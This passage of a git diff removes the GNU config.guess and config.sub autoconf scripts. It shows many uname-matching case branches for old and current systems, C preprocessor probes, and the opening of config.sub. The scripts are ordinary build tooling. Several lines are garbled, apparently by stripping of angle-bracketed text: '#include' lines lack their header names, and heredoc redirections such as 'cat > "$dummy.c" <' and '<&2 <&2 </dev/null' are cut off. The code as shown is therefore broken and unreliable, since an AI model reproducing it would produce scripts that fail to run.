-	  EV67)  UNAME_MACHINE=alphaev67 ;;
-	  EV68*) UNAME_MACHINE=alphaev68 ;;
-	esac
-	objdump --private-headers /bin/sh | grep -q ld.so.1
-	if test "$?" = 0 ; then LIBC=gnulibc1 ; fi
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    arc:Linux:*:* | arceb:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    arm*:Linux:*:*)
-	set_cc_for_build
-	if echo __ARM_EABI__ | $CC_FOR_BUILD -E - 2>/dev/null \
-	    | grep -q __ARM_EABI__
-	then
-	    echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	else
-	    if echo __ARM_PCS_VFP | $CC_FOR_BUILD -E - 2>/dev/null \
-		| grep -q __ARM_PCS_VFP
-	    then
-		echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"eabi
-	    else
-		echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"eabihf
-	    fi
-	fi
-	exit ;;
-    avr32*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    cris:Linux:*:*)
-	echo "$UNAME_MACHINE"-axis-linux-"$LIBC"
-	exit ;;
-    crisv32:Linux:*:*)
-	echo "$UNAME_MACHINE"-axis-linux-"$LIBC"
-	exit ;;
-    e2k:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    frv:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    hexagon:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    i*86:Linux:*:*)
-	echo "$UNAME_MACHINE"-pc-linux-"$LIBC"
-	exit ;;
-    ia64:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    k1om:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    loongarch32:Linux:*:* | loongarch64:Linux:*:* | loongarchx32:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    m32r*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    m68*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    mips:Linux:*:* | mips64:Linux:*:*)
-	set_cc_for_build
-	IS_GLIBC=0
-	test x"${LIBC}" = xgnu && IS_GLIBC=1
-	sed 's/^	//' << EOF > "$dummy.c"
-	#undef CPU
-	#undef mips
-	#undef mipsel
-	#undef mips64
-	#undef mips64el
-	#if ${IS_GLIBC} && defined(_ABI64)
-	LIBCABI=gnuabi64
-	#else
-	#if ${IS_GLIBC} && defined(_ABIN32)
-	LIBCABI=gnuabin32
-	#else
-	LIBCABI=${LIBC}
-	#endif
-	#endif
-
-	#if ${IS_GLIBC} && defined(__mips64) && defined(__mips_isa_rev) && __mips_isa_rev>=6
-	CPU=mipsisa64r6
-	#else
-	#if ${IS_GLIBC} && !defined(__mips64) && defined(__mips_isa_rev) && __mips_isa_rev>=6
-	CPU=mipsisa32r6
-	#else
-	#if defined(__mips64)
-	CPU=mips64
-	#else
-	CPU=mips
-	#endif
-	#endif
-	#endif
-
-	#if defined(__MIPSEL__) || defined(__MIPSEL) || defined(_MIPSEL) || defined(MIPSEL)
-	MIPS_ENDIAN=el
-	#else
-	#if defined(__MIPSEB__) || defined(__MIPSEB) || defined(_MIPSEB) || defined(MIPSEB)
-	MIPS_ENDIAN=
-	#else
-	MIPS_ENDIAN=
-	#endif
-	#endif
-EOF
-	eval "$($CC_FOR_BUILD -E "$dummy.c" 2>/dev/null | grep '^CPU\|^MIPS_ENDIAN\|^LIBCABI')"
-	test "x$CPU" != x && { echo "$CPU${MIPS_ENDIAN}-unknown-linux-$LIBCABI"; exit; }
-	;;
-    mips64el:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    openrisc*:Linux:*:*)
-	echo or1k-unknown-linux-"$LIBC"
-	exit ;;
-    or32:Linux:*:* | or1k*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    padre:Linux:*:*)
-	echo sparc-unknown-linux-"$LIBC"
-	exit ;;
-    parisc64:Linux:*:* | hppa64:Linux:*:*)
-	echo hppa64-unknown-linux-"$LIBC"
-	exit ;;
-    parisc:Linux:*:* | hppa:Linux:*:*)
-	# Look for CPU level
-	case $(grep '^cpu[^a-z]*:' /proc/cpuinfo 2>/dev/null | cut -d' ' -f2) in
-	  PA7*) echo hppa1.1-unknown-linux-"$LIBC" ;;
-	  PA8*) echo hppa2.0-unknown-linux-"$LIBC" ;;
-	  *)    echo hppa-unknown-linux-"$LIBC" ;;
-	esac
-	exit ;;
-    ppc64:Linux:*:*)
-	echo powerpc64-unknown-linux-"$LIBC"
-	exit ;;
-    ppc:Linux:*:*)
-	echo powerpc-unknown-linux-"$LIBC"
-	exit ;;
-    ppc64le:Linux:*:*)
-	echo powerpc64le-unknown-linux-"$LIBC"
-	exit ;;
-    ppcle:Linux:*:*)
-	echo powerpcle-unknown-linux-"$LIBC"
-	exit ;;
-    riscv32:Linux:*:* | riscv32be:Linux:*:* | riscv64:Linux:*:* | riscv64be:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    s390:Linux:*:* | s390x:Linux:*:*)
-	echo "$UNAME_MACHINE"-ibm-linux-"$LIBC"
-	exit ;;
-    sh64*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    sh*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    sparc:Linux:*:* | sparc64:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    tile*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    vax:Linux:*:*)
-	echo "$UNAME_MACHINE"-dec-linux-"$LIBC"
-	exit ;;
-    x86_64:Linux:*:*)
-	set_cc_for_build
-	LIBCABI=$LIBC
-	if test "$CC_FOR_BUILD" != no_compiler_found; then
-	    if (echo '#ifdef __ILP32__'; echo IS_X32; echo '#endif') | \
-		(CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		grep IS_X32 >/dev/null
-	    then
-		LIBCABI="$LIBC"x32
-	    fi
-	fi
-	echo "$UNAME_MACHINE"-pc-linux-"$LIBCABI"
-	exit ;;
-    xtensa*:Linux:*:*)
-	echo "$UNAME_MACHINE"-unknown-linux-"$LIBC"
-	exit ;;
-    i*86:DYNIX/ptx:4*:*)
-	# ptx 4.0 does uname -s correctly, with DYNIX/ptx in there.
-	# earlier versions are messed up and put the nodename in both
-	# sysname and nodename.
-	echo i386-sequent-sysv4
-	exit ;;
-    i*86:UNIX_SV:4.2MP:2.*)
-	# Unixware is an offshoot of SVR4, but it has its own version
-	# number series starting with 2...
-	# I am not positive that other SVR4 systems won't match this,
-	# I just have to hope.  -- rms.
-	# Use sysv4.2uw... so that sysv4* matches it.
-	echo "$UNAME_MACHINE"-pc-sysv4.2uw"$UNAME_VERSION"
-	exit ;;
-    i*86:OS/2:*:*)
-	# If we were able to find `uname', then EMX Unix compatibility
-	# is probably installed.
-	echo "$UNAME_MACHINE"-pc-os2-emx
-	exit ;;
-    i*86:XTS-300:*:STOP)
-	echo "$UNAME_MACHINE"-unknown-stop
-	exit ;;
-    i*86:atheos:*:*)
-	echo "$UNAME_MACHINE"-unknown-atheos
-	exit ;;
-    i*86:syllable:*:*)
-	echo "$UNAME_MACHINE"-pc-syllable
-	exit ;;
-    i*86:LynxOS:2.*:* | i*86:LynxOS:3.[01]*:* | i*86:LynxOS:4.[02]*:*)
-	echo i386-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    i*86:*DOS:*:*)
-	echo "$UNAME_MACHINE"-pc-msdosdjgpp
-	exit ;;
-    i*86:*:4.*:*)
-	UNAME_REL=$(echo "$UNAME_RELEASE" | sed 's/\/MP$//')
-	if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then
-		echo "$UNAME_MACHINE"-univel-sysv"$UNAME_REL"
-	else
-		echo "$UNAME_MACHINE"-pc-sysv"$UNAME_REL"
-	fi
-	exit ;;
-    i*86:*:5:[678]*)
-	# UnixWare 7.x, OpenUNIX and OpenServer 6.
-	case $(/bin/uname -X | grep "^Machine") in
-	    *486*)	     UNAME_MACHINE=i486 ;;
-	    *Pentium)	     UNAME_MACHINE=i586 ;;
-	    *Pent*|*Celeron) UNAME_MACHINE=i686 ;;
-	esac
-	echo "$UNAME_MACHINE-unknown-sysv${UNAME_RELEASE}${UNAME_SYSTEM}${UNAME_VERSION}"
-	exit ;;
-    i*86:*:3.2:*)
-	if test -f /usr/options/cb.name; then
-		UNAME_REL=$(sed -n 's/.*Version //p' /dev/null >/dev/null ; then
-		UNAME_REL=$( (/bin/uname -X|grep Release|sed -e 's/.*= //'))
-		(/bin/uname -X|grep i80486 >/dev/null) && UNAME_MACHINE=i486
-		(/bin/uname -X|grep '^Machine.*Pentium' >/dev/null) \
-			&& UNAME_MACHINE=i586
-		(/bin/uname -X|grep '^Machine.*Pent *II' >/dev/null) \
-			&& UNAME_MACHINE=i686
-		(/bin/uname -X|grep '^Machine.*Pentium Pro' >/dev/null) \
-			&& UNAME_MACHINE=i686
-		echo "$UNAME_MACHINE"-pc-sco"$UNAME_REL"
-	else
-		echo "$UNAME_MACHINE"-pc-sysv32
-	fi
-	exit ;;
-    pc:*:*:*)
-	# Left here for compatibility:
-	# uname -m prints for DJGPP always 'pc', but it prints nothing about
-	# the processor, so we play safe by assuming i586.
-	# Note: whatever this is, it MUST be the same as what config.sub
-	# prints for the "djgpp" host, or else GDB configure will decide that
-	# this is a cross-build.
-	echo i586-pc-msdosdjgpp
-	exit ;;
-    Intel:Mach:3*:*)
-	echo i386-pc-mach3
-	exit ;;
-    paragon:*:*:*)
-	echo i860-intel-osf1
-	exit ;;
-    i860:*:4.*:*) # i860-SVR4
-	if grep Stardent /usr/include/sys/uadmin.h >/dev/null 2>&1 ; then
-	  echo i860-stardent-sysv"$UNAME_RELEASE" # Stardent Vistra i860-SVR4
-	else # Add other i860-SVR4 vendors below as they are discovered.
-	  echo i860-unknown-sysv"$UNAME_RELEASE"  # Unknown i860-SVR4
-	fi
-	exit ;;
-    mini*:CTIX:SYS*5:*)
-	# "miniframe"
-	echo m68010-convergent-sysv
-	exit ;;
-    mc68k:UNIX:SYSTEM5:3.51m)
-	echo m68k-convergent-sysv
-	exit ;;
-    M680?0:D-NIX:5.3:*)
-	echo m68k-diab-dnix
-	exit ;;
-    M68*:*:R3V[5678]*:*)
-	test -r /sysV68 && { echo 'm68k-motorola-sysv'; exit; } ;;
-    3[345]??:*:4.0:3.0 | 3[34]??A:*:4.0:3.0 | 3[34]??,*:*:4.0:3.0 | 3[34]??/*:*:4.0:3.0 | 4400:*:4.0:3.0 | 4850:*:4.0:3.0 | SKA40:*:4.0:3.0 | SDS2:*:4.0:3.0 | SHG2:*:4.0:3.0 | S7501*:*:4.0:3.0)
-	OS_REL=''
-	test -r /etc/.relid \
-	&& OS_REL=.$(sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid)
-	/bin/uname -p 2>/dev/null | grep 86 >/dev/null \
-	  && { echo i486-ncr-sysv4.3"$OS_REL"; exit; }
-	/bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \
-	  && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } ;;
-    3[34]??:*:4.0:* | 3[34]??,*:*:4.0:*)
-	/bin/uname -p 2>/dev/null | grep 86 >/dev/null \
-	  && { echo i486-ncr-sysv4; exit; } ;;
-    NCR*:*:4.2:* | MPRAS*:*:4.2:*)
-	OS_REL='.3'
-	test -r /etc/.relid \
-	    && OS_REL=.$(sed -n 's/[^ ]* [^ ]* \([0-9][0-9]\).*/\1/p' < /etc/.relid)
-	/bin/uname -p 2>/dev/null | grep 86 >/dev/null \
-	    && { echo i486-ncr-sysv4.3"$OS_REL"; exit; }
-	/bin/uname -p 2>/dev/null | /bin/grep entium >/dev/null \
-	    && { echo i586-ncr-sysv4.3"$OS_REL"; exit; }
-	/bin/uname -p 2>/dev/null | /bin/grep pteron >/dev/null \
-	    && { echo i586-ncr-sysv4.3"$OS_REL"; exit; } ;;
-    m68*:LynxOS:2.*:* | m68*:LynxOS:3.0*:*)
-	echo m68k-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    mc68030:UNIX_System_V:4.*:*)
-	echo m68k-atari-sysv4
-	exit ;;
-    TSUNAMI:LynxOS:2.*:*)
-	echo sparc-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    rs6000:LynxOS:2.*:*)
-	echo rs6000-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    PowerPC:LynxOS:2.*:* | PowerPC:LynxOS:3.[01]*:* | PowerPC:LynxOS:4.[02]*:*)
-	echo powerpc-unknown-lynxos"$UNAME_RELEASE"
-	exit ;;
-    SM[BE]S:UNIX_SV:*:*)
-	echo mips-dde-sysv"$UNAME_RELEASE"
-	exit ;;
-    RM*:ReliantUNIX-*:*:*)
-	echo mips-sni-sysv4
-	exit ;;
-    RM*:SINIX-*:*:*)
-	echo mips-sni-sysv4
-	exit ;;
-    *:SINIX-*:*:*)
-	if uname -p 2>/dev/null >/dev/null ; then
-		UNAME_MACHINE=$( (uname -p) 2>/dev/null)
-		echo "$UNAME_MACHINE"-sni-sysv4
-	else
-		echo ns32k-sni-sysv
-	fi
-	exit ;;
-    PENTIUM:*:4.0*:*)	# Unisys `ClearPath HMP IX 4000' SVR4/MP effort
-			# says 
-	echo i586-unisys-sysv4
-	exit ;;
-    *:UNIX_System_V:4*:FTX*)
-	# From Gerald Hewes .
-	# How about differentiating between stratus architectures? -djm
-	echo hppa1.1-stratus-sysv4
-	exit ;;
-    *:*:*:FTX*)
-	# From seanf@swdc.stratus.com.
-	echo i860-stratus-sysv4
-	exit ;;
-    i*86:VOS:*:*)
-	# From Paul.Green@stratus.com.
-	echo "$UNAME_MACHINE"-stratus-vos
-	exit ;;
-    *:VOS:*:*)
-	# From Paul.Green@stratus.com.
-	echo hppa1.1-stratus-vos
-	exit ;;
-    mc68*:A/UX:*:*)
-	echo m68k-apple-aux"$UNAME_RELEASE"
-	exit ;;
-    news*:NEWS-OS:6*:*)
-	echo mips-sony-newsos6
-	exit ;;
-    R[34]000:*System_V*:*:* | R4000:UNIX_SYSV:*:* | R*000:UNIX_SV:*:*)
-	if test -d /usr/nec; then
-		echo mips-nec-sysv"$UNAME_RELEASE"
-	else
-		echo mips-unknown-sysv"$UNAME_RELEASE"
-	fi
-	exit ;;
-    BeBox:BeOS:*:*)	# BeOS running on hardware made by Be, PPC only.
-	echo powerpc-be-beos
-	exit ;;
-    BeMac:BeOS:*:*)	# BeOS running on Mac or Mac clone, PPC only.
-	echo powerpc-apple-beos
-	exit ;;
-    BePC:BeOS:*:*)	# BeOS running on Intel PC compatible.
-	echo i586-pc-beos
-	exit ;;
-    BePC:Haiku:*:*)	# Haiku running on Intel PC compatible.
-	echo i586-pc-haiku
-	exit ;;
-    x86_64:Haiku:*:*)
-	echo x86_64-unknown-haiku
-	exit ;;
-    SX-4:SUPER-UX:*:*)
-	echo sx4-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-5:SUPER-UX:*:*)
-	echo sx5-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-6:SUPER-UX:*:*)
-	echo sx6-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-7:SUPER-UX:*:*)
-	echo sx7-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-8:SUPER-UX:*:*)
-	echo sx8-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-8R:SUPER-UX:*:*)
-	echo sx8r-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    SX-ACE:SUPER-UX:*:*)
-	echo sxace-nec-superux"$UNAME_RELEASE"
-	exit ;;
-    Power*:Rhapsody:*:*)
-	echo powerpc-apple-rhapsody"$UNAME_RELEASE"
-	exit ;;
-    *:Rhapsody:*:*)
-	echo "$UNAME_MACHINE"-apple-rhapsody"$UNAME_RELEASE"
-	exit ;;
-    arm64:Darwin:*:*)
-	echo aarch64-apple-darwin"$UNAME_RELEASE"
-	exit ;;
-    *:Darwin:*:*)
-	UNAME_PROCESSOR=$(uname -p)
-	case $UNAME_PROCESSOR in
-	    unknown) UNAME_PROCESSOR=powerpc ;;
-	esac
-	if command -v xcode-select > /dev/null 2> /dev/null && \
-		! xcode-select --print-path > /dev/null 2> /dev/null ; then
-	    # Avoid executing cc if there is no toolchain installed as
-	    # cc will be a stub that puts up a graphical alert
-	    # prompting the user to install developer tools.
-	    CC_FOR_BUILD=no_compiler_found
-	else
-	    set_cc_for_build
-	fi
-	if test "$CC_FOR_BUILD" != no_compiler_found; then
-	    if (echo '#ifdef __LP64__'; echo IS_64BIT_ARCH; echo '#endif') | \
-		   (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		   grep IS_64BIT_ARCH >/dev/null
-	    then
-		case $UNAME_PROCESSOR in
-		    i386) UNAME_PROCESSOR=x86_64 ;;
-		    powerpc) UNAME_PROCESSOR=powerpc64 ;;
-		esac
-	    fi
-	    # On 10.4-10.6 one might compile for PowerPC via gcc -arch ppc
-	    if (echo '#ifdef __POWERPC__'; echo IS_PPC; echo '#endif') | \
-		   (CCOPTS="" $CC_FOR_BUILD -E - 2>/dev/null) | \
-		   grep IS_PPC >/dev/null
-	    then
-		UNAME_PROCESSOR=powerpc
-	    fi
-	elif test "$UNAME_PROCESSOR" = i386 ; then
-	    # uname -m returns i386 or x86_64
-	    UNAME_PROCESSOR=$UNAME_MACHINE
-	fi
-	echo "$UNAME_PROCESSOR"-apple-darwin"$UNAME_RELEASE"
-	exit ;;
-    *:procnto*:*:* | *:QNX:[0123456789]*:*)
-	UNAME_PROCESSOR=$(uname -p)
-	if test "$UNAME_PROCESSOR" = x86; then
-		UNAME_PROCESSOR=i386
-		UNAME_MACHINE=pc
-	fi
-	echo "$UNAME_PROCESSOR"-"$UNAME_MACHINE"-nto-qnx"$UNAME_RELEASE"
-	exit ;;
-    *:QNX:*:4*)
-	echo i386-pc-qnx
-	exit ;;
-    NEO-*:NONSTOP_KERNEL:*:*)
-	echo neo-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSE-*:NONSTOP_KERNEL:*:*)
-	echo nse-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSR-*:NONSTOP_KERNEL:*:*)
-	echo nsr-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSV-*:NONSTOP_KERNEL:*:*)
-	echo nsv-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    NSX-*:NONSTOP_KERNEL:*:*)
-	echo nsx-tandem-nsk"$UNAME_RELEASE"
-	exit ;;
-    *:NonStop-UX:*:*)
-	echo mips-compaq-nonstopux
-	exit ;;
-    BS2000:POSIX*:*:*)
-	echo bs2000-siemens-sysv
-	exit ;;
-    DS/*:UNIX_System_V:*:*)
-	echo "$UNAME_MACHINE"-"$UNAME_SYSTEM"-"$UNAME_RELEASE"
-	exit ;;
-    *:Plan9:*:*)
-	# "uname -m" is not consistent, so use $cputype instead. 386
-	# is converted to i386 for consistency with other x86
-	# operating systems.
-	# shellcheck disable=SC2154
-	if test "$cputype" = 386; then
-	    UNAME_MACHINE=i386
-	else
-	    UNAME_MACHINE="$cputype"
-	fi
-	echo "$UNAME_MACHINE"-unknown-plan9
-	exit ;;
-    *:TOPS-10:*:*)
-	echo pdp10-unknown-tops10
-	exit ;;
-    *:TENEX:*:*)
-	echo pdp10-unknown-tenex
-	exit ;;
-    KS10:TOPS-20:*:* | KL10:TOPS-20:*:* | TYPE4:TOPS-20:*:*)
-	echo pdp10-dec-tops20
-	exit ;;
-    XKL-1:TOPS-20:*:* | TYPE5:TOPS-20:*:*)
-	echo pdp10-xkl-tops20
-	exit ;;
-    *:TOPS-20:*:*)
-	echo pdp10-unknown-tops20
-	exit ;;
-    *:ITS:*:*)
-	echo pdp10-unknown-its
-	exit ;;
-    SEI:*:*:SEIUX)
-	echo mips-sei-seiux"$UNAME_RELEASE"
-	exit ;;
-    *:DragonFly:*:*)
-	echo "$UNAME_MACHINE"-unknown-dragonfly"$(echo "$UNAME_RELEASE"|sed -e 's/[-(].*//')"
-	exit ;;
-    *:*VMS:*:*)
-	UNAME_MACHINE=$( (uname -p) 2>/dev/null)
-	case "$UNAME_MACHINE" in
-	    A*) echo alpha-dec-vms ; exit ;;
-	    I*) echo ia64-dec-vms ; exit ;;
-	    V*) echo vax-dec-vms ; exit ;;
-	esac ;;
-    *:XENIX:*:SysV)
-	echo i386-pc-xenix
-	exit ;;
-    i*86:skyos:*:*)
-	echo "$UNAME_MACHINE"-pc-skyos"$(echo "$UNAME_RELEASE" | sed -e 's/ .*$//')"
-	exit ;;
-    i*86:rdos:*:*)
-	echo "$UNAME_MACHINE"-pc-rdos
-	exit ;;
-    *:AROS:*:*)
-	echo "$UNAME_MACHINE"-unknown-aros
-	exit ;;
-    x86_64:VMkernel:*:*)
-	echo "$UNAME_MACHINE"-unknown-esx
-	exit ;;
-    amd64:Isilon\ OneFS:*:*)
-	echo x86_64-unknown-onefs
-	exit ;;
-    *:Unleashed:*:*)
-	echo "$UNAME_MACHINE"-unknown-unleashed"$UNAME_RELEASE"
-	exit ;;
-esac
-
-# No uname command or uname output not recognized.
-set_cc_for_build
-cat > "$dummy.c" <
-#include 
-#endif
-#if defined(ultrix) || defined(_ultrix) || defined(__ultrix) || defined(__ultrix__)
-#if defined (vax) || defined (__vax) || defined (__vax__) || defined(mips) || defined(__mips) || defined(__mips__) || defined(MIPS) || defined(__MIPS__)
-#include 
-#if defined(_SIZE_T_) || defined(SIGLOST)
-#include 
-#endif
-#endif
-#endif
-main ()
-{
-#if defined (sony)
-#if defined (MIPSEB)
-  /* BFD wants "bsd" instead of "newsos".  Perhaps BFD should be changed,
-     I don't know....  */
-  printf ("mips-sony-bsd\n"); exit (0);
-#else
-#include 
-  printf ("m68k-sony-newsos%s\n",
-#ifdef NEWSOS4
-  "4"
-#else
-  ""
-#endif
-  ); exit (0);
-#endif
-#endif
-
-#if defined (NeXT)
-#if !defined (__ARCHITECTURE__)
-#define __ARCHITECTURE__ "m68k"
-#endif
-  int version;
-  version=$( (hostinfo | sed -n 's/.*NeXT Mach \([0-9]*\).*/\1/p') 2>/dev/null);
-  if (version < 4)
-    printf ("%s-next-nextstep%d\n", __ARCHITECTURE__, version);
-  else
-    printf ("%s-next-openstep%d\n", __ARCHITECTURE__, version);
-  exit (0);
-#endif
-
-#if defined (MULTIMAX) || defined (n16)
-#if defined (UMAXV)
-  printf ("ns32k-encore-sysv\n"); exit (0);
-#else
-#if defined (CMU)
-  printf ("ns32k-encore-mach\n"); exit (0);
-#else
-  printf ("ns32k-encore-bsd\n"); exit (0);
-#endif
-#endif
-#endif
-
-#if defined (__386BSD__)
-  printf ("i386-pc-bsd\n"); exit (0);
-#endif
-
-#if defined (sequent)
-#if defined (i386)
-  printf ("i386-sequent-dynix\n"); exit (0);
-#endif
-#if defined (ns32000)
-  printf ("ns32k-sequent-dynix\n"); exit (0);
-#endif
-#endif
-
-#if defined (_SEQUENT_)
-  struct utsname un;
-
-  uname(&un);
-  if (strncmp(un.version, "V2", 2) == 0) {
-    printf ("i386-sequent-ptx2\n"); exit (0);
-  }
-  if (strncmp(un.version, "V1", 2) == 0) { /* XXX is V1 correct? */
-    printf ("i386-sequent-ptx1\n"); exit (0);
-  }
-  printf ("i386-sequent-ptx\n"); exit (0);
-#endif
-
-#if defined (vax)
-#if !defined (ultrix)
-#include 
-#if defined (BSD)
-#if BSD == 43
-  printf ("vax-dec-bsd4.3\n"); exit (0);
-#else
-#if BSD == 199006
-  printf ("vax-dec-bsd4.3reno\n"); exit (0);
-#else
-  printf ("vax-dec-bsd\n"); exit (0);
-#endif
-#endif
-#else
-  printf ("vax-dec-bsd\n"); exit (0);
-#endif
-#else
-#if defined(_SIZE_T_) || defined(SIGLOST)
-  struct utsname un;
-  uname (&un);
-  printf ("vax-dec-ultrix%s\n", un.release); exit (0);
-#else
-  printf ("vax-dec-ultrix\n"); exit (0);
-#endif
-#endif
-#endif
-#if defined(ultrix) || defined(_ultrix) || defined(__ultrix) || defined(__ultrix__)
-#if defined(mips) || defined(__mips) || defined(__mips__) || defined(MIPS) || defined(__MIPS__)
-#if defined(_SIZE_T_) || defined(SIGLOST)
-  struct utsname *un;
-  uname (&un);
-  printf ("mips-dec-ultrix%s\n", un.release); exit (0);
-#else
-  printf ("mips-dec-ultrix\n"); exit (0);
-#endif
-#endif
-#endif
-
-#if defined (alliant) && defined (i860)
-  printf ("i860-alliant-bsd\n"); exit (0);
-#endif
-
-  exit (1);
-}
-EOF
-
-$CC_FOR_BUILD -o "$dummy" "$dummy.c" 2>/dev/null && SYSTEM_NAME=$($dummy) &&
-	{ echo "$SYSTEM_NAME"; exit; }
-
-# Apollos put the system type in the environment.
-test -d /usr/apollo && { echo "$ISP-apollo-$SYSTYPE"; exit; }
-
-echo "$0: unable to guess system type" >&2
-
-case "$UNAME_MACHINE:$UNAME_SYSTEM" in
-    mips:Linux | mips64:Linux)
-	# If we got here on MIPS GNU/Linux, output extra information.
-	cat >&2 <&2 <&2 </dev/null || echo unknown)
-uname -r = $( (uname -r) 2>/dev/null || echo unknown)
-uname -s = $( (uname -s) 2>/dev/null || echo unknown)
-uname -v = $( (uname -v) 2>/dev/null || echo unknown)
-
-/usr/bin/uname -p = $( (/usr/bin/uname -p) 2>/dev/null)
-/bin/uname -X     = $( (/bin/uname -X) 2>/dev/null)
-
-hostinfo               = $( (hostinfo) 2>/dev/null)
-/bin/universe          = $( (/bin/universe) 2>/dev/null)
-/usr/bin/arch -k       = $( (/usr/bin/arch -k) 2>/dev/null)
-/bin/arch              = $( (/bin/arch) 2>/dev/null)
-/usr/bin/oslevel       = $( (/usr/bin/oslevel) 2>/dev/null)
-/usr/convex/getsysinfo = $( (/usr/convex/getsysinfo) 2>/dev/null)
-
-UNAME_MACHINE = "$UNAME_MACHINE"
-UNAME_RELEASE = "$UNAME_RELEASE"
-UNAME_SYSTEM  = "$UNAME_SYSTEM"
-UNAME_VERSION = "$UNAME_VERSION"
-EOF
-fi
-
-exit 1
-
-# Local variables:
-# eval: (add-hook 'before-save-hook 'time-stamp)
-# time-stamp-start: "timestamp='"
-# time-stamp-format: "%:y-%02m-%02d"
-# time-stamp-end: "'"
-# End:
diff --git a/config/config.sub b/config/config.sub
deleted file mode 100755
index 63c1f1c8b..000000000
--- a/config/config.sub
+++ /dev/null
@@ -1,1860 +0,0 @@
-#! /bin/sh
-# Configuration validation subroutine script.
-#   Copyright 1992-2021 Free Software Foundation, Inc.
-
-timestamp='2021-01-08'
-
-# This file is free software; you can redistribute it and/or modify it
-# under the terms of the GNU General Public License as published by
-# the Free Software Foundation; either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful, but
-# WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-# General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program; if not, see .
-#
-# As a special exception to the GNU General Public License, if you
-# distribute this file as part of a program that contains a
-# configuration script generated by Autoconf, you may include it under
-# the same distribution terms that you use for the rest of that
-# program.  This Exception is an additional permission under section 7
-# of the GNU General Public License, version 3 ("GPLv3").
-
-
-# Please send patches to .
-#
-# Configuration subroutine to validate and canonicalize a configuration type.
-# Supply the specified configuration type as an argument.
-# If it is invalid, we print an error message on stderr and exit with code 1.
-# Otherwise, we print the canonical config type on stdout and succeed.
-
-# You can get the latest version of this script from:
-# https://git.savannah.gnu.org/cgit/config.git/plain/config.sub
-
-# This file is supposed to be the same for all GNU packages
-# and recognize all the CPU types, system types and aliases
-# that are meaningful with *any* GNU software.
-# Each package is responsible for reporting which valid configurations
-# it does not support.  The user should be able to distinguish
-# a failure to support a valid configuration from a meaningless
-# configuration.
-
-# The goal of this file is to map all the various variations of a given
-# machine specification into a single specification in the form:
-#	CPU_TYPE-MANUFACTURER-OPERATING_SYSTEM
-# or in some cases, the newer four-part form:
-#	CPU_TYPE-MANUFACTURER-KERNEL-OPERATING_SYSTEM
-# It is wrong to echo any other type of specification.
-
-me=$(echo "$0" | sed -e 's,.*/,,')
-
-usage="\
-Usage: $0 [OPTION] CPU-MFR-OPSYS or ALIAS
-
-Canonicalize a configuration name.
-
-Options:
-  -h, --help         print this help, then exit
-  -t, --time-stamp   print date of last modification, then exit
-  -v, --version      print version number, then exit
-
-Report bugs and patches to ."
-
-version="\
-GNU config.sub ($timestamp)
-
-Copyright 1992-2021 Free Software Foundation, Inc.
-
-This is free software; see the source for copying conditions.  There is NO
-warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE."
-
-help="
-Try \`$me --help' for more information."
-
-# Parse command line
-while test $# -gt 0 ; do
-  case $1 in
-    --time-stamp | --time* | -t )
-       echo "$timestamp" ; exit ;;
-    --version | -v )
-       echo "$version" ; exit ;;
-    --help | --h* | -h )
-       echo "$usage"; exit ;;
-    -- )     # Stop option processing
-       shift; break ;;
-    - )	# Use stdin as input.
-       break ;;
